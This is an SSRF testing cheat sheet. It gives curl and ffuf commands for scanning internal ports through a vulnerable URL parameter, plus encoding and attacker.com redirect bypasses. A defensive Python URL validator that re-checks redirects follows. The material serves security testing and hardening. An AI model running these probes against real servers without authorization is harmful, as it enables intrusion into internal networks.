SSRF

Server-side request forgery

Enumeration
  • Look for parameters that accept URLs.

  • Test in forms, webhooks, or file uploads.

  • Test with http://localhost or http://127.0.0.1.

Use Interactsh to detect out-of-band (OOB) interactions:

interactsh-client

Internal Port Scanning

Test for internal port access:

curl "https://target.com/ssrf?url=http://localhost:22" -v

  • Use time-based delays or OOB techniques to detect open ports.

  • Check whether the response time differs between open and closed ports.

Fuzz the port number with ffuf (the URL is quoted so the shell does not interpret ? and &):

ffuf -w ports.txt -u "https://target.com/ssrf?url=http://localhost:FUZZ" -mc 200 -t 10
Bypass Filters

  • URL encoding: http://127.0.0.1, or http://%6c%6f%63%61%6c%68%6f%73%74 (percent-encoded "localhost").

  • Domain redirection: http://attacker.com/redirect?target=localhost (an external host that redirects the server to an internal address).
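The server-side check that closes both bypasses above, as an added example that is not part of the original page: the hostname is percent-decoded and resolved before the address check, every resolved address must be globally routable, and redirects are followed by hand so each hop is re-validated. The `fetch` callable and the `resolver` parameter are assumptions introduced here so the logic can be run offline.

```python
import ipaddress
import socket
from urllib.parse import unquote, urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
REDIRECT_STATUSES = {301, 302, 303, 307, 308}

def resolve_all(host):
    """Every address the host maps to (IPv4 and IPv6), so no record is skipped."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_safe_url(url, resolver=resolve_all):
    """True only if the URL is http(s) and every address its host maps to is
    globally routable. The host is percent-decoded first, so
    http://%6c%6f%63%61%6c%68%6f%73%74 is checked as 'localhost'."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    host = unquote(parts.hostname)
    try:
        # IP literals need no lookup; names are resolved so the check sees
        # the addresses the HTTP client would actually connect to.
        ipaddress.ip_address(host)
        addresses = {host}
    except ValueError:
        try:
            addresses = resolver(host)  # resolver is an injected assumption
        except (OSError, LookupError):
            return False  # unresolvable host: fail closed
    for addr in addresses:
        ip = ipaddress.ip_address(addr)
        if not ip.is_global or ip.is_multicast:
            return False  # loopback, private, link-local, reserved, multicast
    return True

def fetch_with_hop_checks(url, fetch, resolver=resolve_all, max_hops=3):
    """Follow redirects by hand and re-validate each hop, so a chain like
    http://attacker.com/redirect?target=localhost is refused at the hop that
    points inward. fetch(url) is a hypothetical client that must NOT follow
    redirects itself and returns (status, headers, body)."""
    for _ in range(max_hops + 1):
        if not is_safe_url(url, resolver):
            raise ValueError(f"blocked outbound request to {url}")
        status, headers, body = fetch(url)
        if status not in REDIRECT_STATUSES:
            return status, body
        url = urljoin(url, headers.get("Location", ""))
    raise ValueError("too many redirects")
```

A real client should connect to the address that was checked rather than resolving the name a second time, so that validation and connection cannot see different answers.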
